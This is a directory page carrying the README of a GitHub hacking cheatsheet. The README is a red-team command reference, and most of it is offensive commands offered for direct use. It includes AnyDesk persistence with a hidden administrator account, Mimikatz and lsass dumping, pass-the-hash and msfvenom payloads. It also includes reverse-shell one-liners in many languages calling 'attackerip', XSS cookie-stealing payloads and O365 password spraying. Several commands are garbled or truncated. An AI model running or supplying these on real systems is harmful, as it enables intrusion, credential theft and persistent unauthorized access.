Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/kobs0N/Hacking-Cheatsheet

List of commands and techniques to while conducting any kind of hacking :)
https://github.com/kobs0N/Hacking-Cheatsheet

hackingcheatsheet

Last synced: about 1 month ago
JSON representation

List of commands and techniques to while conducting any kind of hacking :)

Host: GitHub
URL: https://github.com/kobs0N/Hacking-Cheatsheet
Owner: kobs0N
Created: 2017-04-02T09:32:08.000Z (over 7 years ago)
Default Branch: master
Last Pushed: 2023-10-14T13:08:15.000Z (11 months ago)
Last Synced: 2024-04-12T22:56:37.464Z (5 months ago)
Topics: hackingcheatsheet
Homepage: https://zero-defense.com
Size: 195 KB
Stars: 105
Watchers: 6
Forks: 43
Open Issues: 1
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

awesome-hacking-lists - kobs0N/Hacking-Cheatsheet - List of commands and techniques to while conducting any kind of hacking :) (Others)

README

# Red Team and OPSEC - 2023 Edition

> The quieter you become, the more you are able to hear 🥷

## Basic System Info
- `systeminfo`: Show detailed configuration about the computer and OS.
- `hostname`: Display the host name of the current machine.

## Hotfix Information
- `wmic qfe get Caption,Description,HotFixID,InstalledOn`: List patches and hotfixes installed on the system.

## User & Group Information
- `net users`: List all user accounts.
- `net localgroups`: List all local groups.
- `net user hacker`: Show information about the user named "hacker".
- `net group /domain`: List all domain groups.

## Network Details
- `ipconfig /all`: Show detailed IP configuration.
- `route print`: Display routing table.
- `arp -A`: Show ARP cache.

## Privilege Information
- `whoami /priv`: Display user privileges.

## Data Search
- `findstr /spin "password" *.*`: Recursively search for the term "password" in files.

## Process & Service Details
- `tasklist /SVC`: List running processes with service details.
- `sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul`: Identify unquoted service paths which can be exploited for privilege escalation.

## Network Connections
- `netstat -ano`: List network connections, ports, and associated process IDs.

## Directory Access
- `dir /a-r-d /s /b`: Search for writeable directories.

## Domain & Forest Info (PowerShell)
- `[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()`: Get current domain details.
- `([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()`: List trust relationships of current domain.
- `[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()`: Get current forest details.
- `([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()`: List trust relationships of a specific forest.

## Domain Controller and Trusts
- `nltest /dclist:offense.local`: List all Domain Controllers in the specified domain.
- `net group "domain controllers" /domain`: Display domain controllers in the domain.
- `nltest /dsgetdc:offense.local`: Get Domain Controller details for a domain.
- `nltest /domain_trusts`: List all domain trusts.
- `nltest /user:"spotless"`: Fetch details for a specific user.

## Authentication & Session Details
- `set l`: Display local environment variables.
- `klist`: Display Kerberos tickets.
- `klist sessions`: Display all logon sessions, including NTLM.
- `klist tgt`: Display cached Kerberos TGT (Ticket Granting Ticket).

## Miscellaneous
- `whoami`: Display logged-in user details (useful on older systems).

## Host Discovery
Discover alive hosts in a network.
- `$ nmap -sn -T4 -oG Discovery.gnmap 192.168.1.1/24`: Ping scan, no port scan.
- `$ grep “Status: Up” Discovery.gnmap | cut -f 2 -d ‘ ‘ > LiveHosts.txt`: Extract live hosts from the results.

## Top Ports Scan
Identify most commonly used ports.
- `$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt`: TCP SYN scan.
- `$ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt`: UDP scan.

## Full Range Port Scan
Full range port scanning; UDP might be slow.
- `$ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt`: Common 3674 TCP ports.
- `$ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt`: All TCP ports.
- `$ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt`: All UDP ports.

## Extract Open Ports
Commands to extract and display open TCP and UDP ports.
- `$ grep “open” FullTCP | cut -f 1 -d ‘ ‘ | sort -nu | cut -f 1 -d ‘/’ | xargs | sed ‘s/ /,/g’ | awk ‘{print “T:”$0}’`
- `$ grep “open” FullUDP | cut -f 1 -d ‘ ‘ | sort -nu | cut -f 1 -d ‘/’ | xargs | sed ‘s/ /,/g’ | awk ‘{print “U:”$0}’`

## Service and OS Detection
Identify services running and OS details.
- `$ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt`: Service detection.
- `$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt`: OS detection.
- `$ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt`: Combined OS and service detection for specific ports.

## Evasion Techniques
Methods to avoid firewalls or obfuscate scan origin.

### Segmentation
- `$ nmap -f`: Segmented packet scan.

### MTU Manipulation
- `$ nmap --mtu 24`: Change MTU size. It should be a multiple of 8.

### Decoy Scanning
Make it appear the scan is coming from other hosts.
- `$ nmap -D RND:10 [target]`: Randomized decoy scan.
- `$ nmap -D decoy1,decoy2,decoy3 [target]`: Manually specify decoys.

### Zombie Host Scanning
Use idle hosts to mask scan origin.
- `$ nmap -sI [Zombie IP] [Target IP]`: Idle scan using a specific zombie.

### Specified Source Port
- `$ nmap --source-port 80 [target]`: Scan with a specified source port (80 in this case).

## AnyDesk OPSEC Usage
This outlines the usage of AnyDesk, a commercial remote access tool utilized by threat actors for browsing victim host file systems, deploying payloads, and data exfiltration.

**Downloading and Installing AnyDesk:**

1. **Download AnyDesk Executable:**
- Download the AnyDesk executable using PowerShell.
- Example PowerShell Script:
```powershell
Invoke-WebRequest -Uri -OutFile 'C:\ProgramData\AnyDesk.exe'
```

2. **Silent Installation and Password Configuration:**
- Silently install AnyDesk and set an access password.
- Commands:
```batch
cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
cmd.exe /c echo | C:\ProgramData\AnyDesk.exe --set-password
```

**Configuring Additional Administrator Account:**

3. **Create an Additional Administrator Account:**
- Add an administrator account with a password.
- Command:
```batch
net user "" /add
```

4. **Add Account to Administrators Group:**
- Include the new administrator account in the Administrators group.
- Command:
```batch
net localgroup Administrators /ADD
```

5. **Hide Account from Login Screen:**
- Prevent the account from appearing on the login screen.
- Command:
```batch
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v /t REG_DWORD /d 0 /f
```

**Gaining Remote Access with AnyDesk:**

6. **Execute AnyDesk with Get-ID Parameter:**
- Launch AnyDesk with the `--get-id` parameter to enable remote access.
- Command:
```batch
cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id
```

#
# Web Path Scanner and Brute Force Tools

## Web Path Scanners:

### 1. **dirsearch**
- A versatile directory and file brute-forcing tool.
- Usage: `dirsearch [options]`

### 2. **DirBuster**
- A GUI-based tool for directory brute-forcing.
- Ideal for finding hidden web paths.
- Download and usage instructions: [DirBuster](https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)

### 3. **Patator (Password Guessing)**
- Patator is used for password guessing attacks across various protocols.
- Install: `git clone https://github.com/lanjelot/patator.git /usr/share/patator`

## Brute Force with Patator:

```bash
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
$ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'
```

## DNS Enumeration with Fierce:

- Fierce is a DNS enumeration tool that checks for zone transfers and DNS host name enumeration.
- Usage:
```bash
$ ./fierce.pl -dns example.com
$ ./fierce.pl --dns example.com --wordlist myWordList.txt
```

## Web Service Scanning with Nikto:

- Nikto is a web server scanner that detects vulnerabilities and misconfigurations.
- Usage: `nikto -C all -h http://IP`

## WordPress Scan with WPScan:

- WPScan is a specialized tool for scanning WordPress installations.
- Usage:
```bash
git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
./wpscan --url http://IP/ --enumerate p
```

## HTTP Fingerprint Identification with Httprint:

- Httprint identifies HTTP server software and version.
- Usage:
```bash
wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip
cd httprint_301/linux/
./httprint -h http://IP -s signatures.txt
```

## Web Application Security Scanning with Skipfish:

- Skipfish is a comprehensive web application security detection tool.
- It generates interactive site maps and security reports.
- Usage:
```bash
skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP
```

## Network Scanning and Enumeration:

### NC (Netcat) Scan:
```bash
# Basic port scan on 'target'
nc -v -w 1 target -z 1-1000

# Port scan range on a set of IP addresses
for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done
```

### Unicornscan:
```bash
# Unicornscan for information gathering and security audits
# Scanning for all ports and services (TCP and UDP)
us -H -msf -Iv 192.168.56.101 -p 1-65535
us -H -mU -Iv 192.168.56.101 -p 1-65535
```

### Xprobe2 for OS Fingerprinting:
```bash
# Identify the operating system fingerprint on 'IP'
xprobe2 -v -p tcp:80:open IP
```

## Enumeration and Windows Commands:

### Samba Enumeration:
```bash
# Enumeration of Samba services on 'target'
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target
```

### SNMP Enumeration:
```bash
# Enumerating SNMP on 'IP' using different commands
snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
```

### Windows Commands:
```bash
# Various Windows command-line operations
net localgroup Users
net localgroup Administrators
search dir/s *.doc
system("start cmd.exe /k $cmd")
sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp 32
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp 64
```

## Tunneling and Port Forwarding:

### PuTTY Remote Port Forwarding:
```bash
# Forward the remote port to the destination address using PuTTY
plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 IP
```

### Meterpreter Port Forwarding:
```bash
# Meterpreter port forwarding for remote access
# For detailed usage, refer to https://www.offensive-security.com/metasploit-unleashed/portfwd/
meterpreter > portfwd add -l 3389 -p 3389 -r 172.16.194.141
kali > rdesktop 127.0.0.1:3389
```

### Enabling RDP and Firewall Manipulation:
```bash
# Enable the RDP service and configure firewall settings
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

# Close Windows Firewall
netsh firewall set opmode disable
```

### Meterpreter VNC/RDP:
```bash
# Enabling VNC/RDP with Meterpreter
# For detailed usage, refer to https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/
run getgui -u admin -p 1234
run vnc -p 5043
```

### Using Mimikatz:
```bash
# Using Mimikatz to retrieve Windows plaintext user name and password
git clone https://github.com/gentilkiwi/mimikatz.git
privilege::debug
sekurlsa::logonPasswords full
```

# Password Hash Gathering and Cracking

## Gathering Password Hash:

### Using pth-toolkit and pth-winexe:
```bash
# Clone pth-toolkit and retrieve a shell using the hash
git clone https://github.com/byt3bl33d3r/pth-toolkit
pth-winexe -U hash //IP cmd
```

### Using xfreerdp:
```bash
# Install freerdp-x11 and connect using a hash
apt-get install freerdp-x11
xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP
```

### Using Meterpreter:
```bash
# Use Meterpreter to gather hashes
meterpreter > run post/windows/gather/hashdump
```

## Exploiting Hash to Gain Access:

### Using Metasploit psexec:
```bash
# Set up a Meterpreter reverse shell using the hash
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set SMBPass HASH
msf exploit(psexec) > exploit
meterpreter > shell
```

## Password Cracking with Hashcat:

### Using Hashcat:
```bash
# Crack passwords using Hashcat
hashcat -m 400 -a 0 hash /root/rockyou.txt
```

# Using Netcat (NC) for Shell Bouncing on Windows

## Listening and Connecting with NC:

### Setting Up a Listener:
```bash
# Windows: Listen on port 31337 and execute cmd.exe
c:> nc -Lp 31337 -vv -e cmd.exe
```

### Connecting to the Listener:
```bash
# Connect to the Windows listener on IP and port 31337
nc 192.168.0.10 31337
```

### Executing Shell on a Remote Host:
```bash
# Execute cmd.exe on a remote host via NC
c:> nc example.com 80 -e cmd.exe
```

### Setting Up a Listener on Port 80:
```bash
# Listen on port 80
nc -lp 80
```

## Advanced NC Options:

### Bouncing Shell with /bin/bash:
```bash
# Bounce a shell on Windows using /bin/bash
nc -lp 31337 -e /bin/bash
```

### Randomize Output and Wait:
```bash
# Randomize output and wait for 1 second before exiting
nc -vv -r -w 1 192.168.0.10 -z 1-1000
```

# Finding SUID/SGID and Orphaned Files

## Locate SUID root files:
```bash
# Search for SUID root files
find / -user root -perm -4000 -print
```

## Locate SGID root files:
```bash
# Search for SGID root files
find / -group root -perm -2000 -print
```

## Locate SUID and SGID files:
```bash
# Search for both SUID and SGID files
find / -perm -4000 -o -perm -2000 -print
```

## Find files that do not belong to any user:
```bash
# Search for files without an assigned user
find / -nouser -print
```

## Locate files that do not belong to any user group:
```bash
# Search for files without an assigned user group
find / -nogroup -print
```

## Find symbolic links and display their targets:
```bash
# Search for symbolic links and show their targets
find / -type l -ls
```

## Python Shell Escalation:
```bash
# Escalate to a Python shell
python -c 'import pty;pty.spawn("/bin/bash")'
```

# Python, Ruby, and PHP HTTP Servers:

## Python 2 HTTP Server:
```bash
# Start a Python 2 HTTP server
python2 -m SimpleHTTPServer
```

## Python 3 HTTP Server:
```bash
# Start a Python 3 HTTP server
python3 -m http.server
```

## Ruby HTTP Server (WEBrick):
```bash
# Start a Ruby WEBrick HTTP server on port 8888
ruby -rwebrick -e 'WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start'
```

## PHP HTTP Server:
```bash
# Start a PHP HTTP server on IP 0.0.0.0 and port 8888
php -S 0.0.0.0:8888
```

# Getting Process PID:

## Find PID for a Port:
```bash
# Get the PID for a process using port 80
fuser -nv tcp 80
```

## Kill a Process by Port:
```bash
# Kill the process using port 80
fuser -k -n tcp 80
```

# Using Hydra to Crack RDP:

```bash
# Use Hydra to crack RDP with a username list and password file
hydra -l admin -P /root/Desktop/passwords -t 1 -vV -f -o hydra_output.txt rdp://X.X.X.X
```

# Mounting a Remote Windows Shared Folder (SMB):

```bash
# Mount a remote Windows shared folder to /mnt/remote/
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
```

# Compiling an Exploit in Kali:

## Compile a 32-bit Executable:
```bash
# Compile a 32-bit executable from hello.c
gcc -m32 -o output32 hello.c
```

## Compile a 64-bit Executable:
```bash
# Compile a 64-bit executable from hello.c
gcc -m64 -o output hello.c
```

# Compiling a Windows Exploit in Kali:

```bash
# Download and install MinGW
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
# Select mingw32-base during installation
# Navigate to the MinGW bin directory
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
# Compile the exploit.c to ability.exe with necessary libraries
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
# Execute the compiled Windows exploit
wine ability.exe
```

# NASM (Netwide Assembler) Commands:

```bash
# Assemble an assembly source file to binary
nasm -f bin -o payload.bin payload.asm

# Assemble to ELF format and link, then display the disassembled code
nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload
```

# SSH Penetration:

```bash
# SSH tunnel with dynamic port forwarding on local port 1080
ssh -D 127.0.0.1:1080 -p 22 user@IP

# Add SOCKS4 proxy configuration to /etc/proxychains.conf
# Append: socks4 127.0.0.1 1080

# Use proxychains to route commands through the SSH tunnel
proxychains commands target

# SSH penetration from one network to another, chaining multiple SSH connections

# First SSH tunnel with dynamic port forwarding
ssh -D 127.0.0.1:1080 -p 22 user1@IP1

# Add SOCKS4 proxy configuration to /etc/proxychains.conf
# Append: socks4 127.0.0.1 1080

# Second SSH tunnel with dynamic port forwarding through the first tunnel
proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2

# Add SOCKS4 proxy configuration to /etc/proxychains.conf
# Append: socks4 127.0.0.1 1081

# Use proxychains to route commands through the second SSH tunnel
proxychains commands target
```

# Using Metasploit for Penetration

Metasploit is a powerful penetration testing tool that provides a wide range of functionalities for identifying vulnerabilities and executing exploits. Here are some useful Metasploit commands and techniques:

1. **IP Configuration and Routing:**
- Description: Obtain the IP address of the compromised system, configure routing, and pivot through it.
```bash
meterpreter > ipconfig
IP Address: 10.1.13.3
meterpreter > run autoroute -s 10.1.13.0/24
meterpreter > run autoroute -p
10.1.13.0 255.255.255.0 Session 1
```

2. **Exploiting Remote Systems:**
- Description: Exploit a remote Windows system using the SMB psexec exploit module.
```bash
meterpreter > Ctrl+Z
msf auxiliary(tcp) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 10.1.13.2
msf exploit(psexec) > exploit
meterpreter > ipconfig
IP Address: 10.1.13.2
```

3. **Exploit-DB Search:**
- Description: Search for exploits in the Exploit-DB database based on keywords or criteria.
```bash
git clone https://github.com/offensive-security/exploit-database.git
cd exploit-database
./searchsploit -u
./searchsploit apache 2.2
./searchsploit "Linux Kernel"
```

5. **MSF Payload Generation:**
- Description: Generate various Metasploit payloads for different platforms and scenarios.
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe > system.exe
msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=443 -f raw > exploit.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f asp > file.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -b "\x00" -f c
```

6. **MSF Payloads for Linux and Shellcode:**
- Description: Generate payloads and shellcode for Linux and Windows.
```bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=443 -f elf -a x86 > shell
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 -f c
```

7. **Other Payload Types:**
- Description: Generate payloads for Python, ASP, Bash, and more.
```bash
msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp -a x86 > shell.asp
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -o shell.sh
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -o shell.php
# Add ' LPORT= -f exe -a x86 > shell.exe
```
#
# Linux commonly used security commands

find / -uid 0 -perm -4000

find / -perm -o=w

find / -name ” ” -print
find / -name “..” -print
find / -name “. ” -print
find / -name ” ” -print

find / -nouser

lsof +L1

lsof -i

arp -a

getent passwd

getent group

for user in $(getent passwd|cut -f1 -d:); do echo “### Crontabs for $user ####”; crontab -u $user -l; done

cat /dev/urandom| tr -dc ‘a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=’|fold -w 12| head -n 4

find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’
chattr -i file

# Windows Buffer Overflow exploits

msfvenom -p windows/shell_bind_tcp -a x86 –platform win -b “\x00” -f c
msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 –platform win -e x86/shikata_ga_nai -b “\x00” -f c

# COMMONLY USED BAD CHARACTERS:

\x00\x0a\x0d\x20 For http request
\x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c Ending with (0\n\r_)

# Regular command:
pattern create
pattern offset (EIP Address)
pattern offset (ESP Address)
add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )

!pvefindaddr pattern_create 5000
!pvefindaddr suggest
!pvefindaddr nosafeseh

!mona config -set workingfolder C:\Mona\%p

!mona config -get workingfolder
!mona mod
!mona bytearray -b “\x00\x0a”
!mona pc 5000
!mona po EIP
!mona suggest

# SEH – Structured exception handling

Note: SEH (“Structured Exception Handling”), or structured exception handling, is a powerful processor error or exception weapon provided by the Windows operating system to the programmer.

# https://en.wikipedia.org/wiki/Microsoft-specific_exception_handling_mechanisms#SEH
# http://baike.baidu.com/view/243131.htm
!mona suggest
!mona nosafeseh
nseh=”\xeb\x06\x90\x90″ (next seh chain)
iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)

# ROP (DEP)

Note: ROP (“Return-Oriented Programming”) is a computer security exploit technology that allows an attacker to execute code, such as un-executable memory and code signatures, in a security defense situation.

DEP (“Data Execution Prevention”) is a set of hardware and software technology, in memory, strictly to distinguish between code and data to prevent the data as code execution.

# https://en.wikipedia.org/wiki/Return-oriented_programming
# https://zh.wikipedia.org/wiki/%E8%BF%94%E5%9B%9E%E5%AF%BC%E5%90%91%E7%BC%96%E7%A8%8B
# https://en.wikipedia.org/wiki/Data_Execution_Prevention
# http://baike.baidu.com/item/DEP/7694630
!mona modules
!mona ropfunc -m *.dll -cpb “\x00\x09\x0a”
!mona rop -m *.dll -cpb “\x00\x09\x0a” (auto suggest)

# ASLR – Address space format randomization
# https://en.wikipedia.org/wiki/Address_space_layout_randomization
!mona noaslr
# EGG Hunter technology

Egg hunting This technique can be categorized as a “graded shellcode”, which basically supports you to find your actual (larger) shellcode (our “egg”) with a small, specially crafted shellcode, In search of our final shellcode. In other words, a short code executes first, then goes to the real shellcode and executes it. – Making reference to see Ice Forum , more details can be found in the code I add comments link.

# https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
# http://www.pediy.com/kssd/pediy12/116190/831793/45248.pdf
# http://www.fuzzysecurity.com/tutorials/expDev/4.html
!mona jmp -r esp
!mona egg -t lxxl
\xeb\xc4 (jump backward -60)
buff=lxxllxxl+shell
!mona egg -t ‘w00t’

# GDB Debugger commonly used commands

break *_start
next
step
n
s
continue
c

# Data
checking ‘REGISTERS’ and ‘MEMORY’

# Display the register values: (Decimal,Binary,Hex)
print /d –> Decimal
print /t –> Binary
print /x –> Hex
O/P :
(gdb) print /d $eax
$17 = 13
(gdb) print /t $eax
$18 = 1101
(gdb) print /x $eax
$19 = 0xd
(gdb)

# Display the value of a specific memory address
command : x/nyz (Examine)
n –> Number of fields to display ==>
y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)
z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)

# BASH rebound Shell

bash -i >& /dev/tcp/X.X.X.X/443 0>&1

exec /bin/bash 0&0 2>&0
exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
exec 5<>/dev/tcp/attackerip/4444

cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done

/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
/bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1

# PERL rebound Shell

perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:443″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

# Win platform
perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

# RUBY rebound Shell

ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”443″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’

# Win platform
ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”443″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
ruby -rsocket -e ‘f=TCPSocket.open(“attackerip”,”443″).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

# PYTHON rebound Shell

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“attackerip”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

# PHP bounce Shell

php -r ‘$sock=fsockopen(“attackerip”,443);exec(“/bin/sh -i <&3 >&3 2>&3”);’

# JAVA rebound Shell

r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])
p.waitFor()

# NETCAT rebound Shell

nc -e /bin/sh attackerip 4444
nc -e /bin/sh 192.168.37.10 443

# If the -e parameter is disabled, you can try the following command
# mknod backpipe p && nc attackerip 443 0backpipe
/bin/sh | nc attackerip 443
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4443 0/tmp/

# If you installed the wrong version of netcat, try the following command
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f

TELNET rebound Shell

# If netcat is not available
mknod backpipe p && telnet attackerip 443 0backpipe

XTERM rebound Shell

# Enable the X server (: 1 – listen on TCP port 6001)

apt-get install xnest
Xnest :1

# Remember to authorize the connection from the target IP
xterm -display 127.0.0.1:1
# Grant access
xhost +targetip

# Connect back to our X server on the target machine
xterm -display attackerip:1
/usr/openwin/bin/xterm -display attackerip:1
or
$ DISPLAY=attackerip:0 xterm

# XSS

# https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
(“< iframes > src=http://IP:PORT iframes >”)

document.location=http://IP:PORT

‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83))

“;!–”=&{()}

alert(“XSS”)””>

perl -e ‘print “”;’ > out

(“>< iframes http://google.com < iframes >)

“>alert(document.cookie)
%253cscript%253ealert(document.cookie)%253c/script%253e
“>alert(document.cookie)
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E

SSH Over SCTP (using Socat)

$ socat SCTP-LISTEN:80,fork TCP:localhost:22
$ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80
$ ssh -lusername localhost -D 8080 -p 1337

# Metagoofil – Metadata collection tool

Note: Metagoofil is a tool for collecting information using Google.
$ python metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o examplefiles -f results.html

# Use a DNS tunnel to bypass the firewall

$ apt-get update
$ apt-get -y install ruby-dev git make g++
$ gem install bundler
$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server
$ bundle install
$ ruby ./dnscat2.rb
dnscat2> New session established: 16059
dnscat2> session -i 16059

# Red-Team and Infrastructure Assessments

### External recon

https://github.com/dcsync/recontools

### O365 bruting

`python3 office365userenum.py -u test.txt -v -o output.txt --password 'Password1`

Enumeration (opsec safe):

`python o365creeper.py -f test.txt`

https://github.com/0xZDH/o365spray

### subdomain finder

https://spyse.com/

### Cert search
https://crt.sh
`%.blah.com`
### search categorized expired domain
`python3 ./domainhunter.py -r 1000`

### Metadata
`PS C:\> Invoke-PowerMeta -TargetDomain targetdomain.com`

## Domain User Enumeration

### MailSniper

#### Usernameharvest
`Invoke-UsernameHarvestOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Threads 1 -OutFile owa-valid-users.txt`
#### Domainnameharvest
`Invoke-DomainHarvestOWA -ExchHostname mail.domain.com`
#### OWA Spray
`Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile owa-sprayed-creds.txt`

### Grab employee names from Linkedin

`theharvester -d blah.com -l 1000 -b linkedin`

https://github.com/m8r0wn/CrossLinked

### Extract Linkedin details from snov.io

Regex to extract emails

`grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b"`

### Extract from burp

`cat linkedin.txt | tr , '\n' | sed 's/\”//g' | awk '/"title":{"textDirection":"FIRST_STRONG"/{getline; print}'`

### Change format to b.lah

`awk '=FS tolower(substr(,1,1)$NF)' linkedin-user-list.txt | awk '{ print }'`

`awk '{print $0,tolower(substr($1,1,1)$NF)}' names.txt`

### Check usernames against AD:

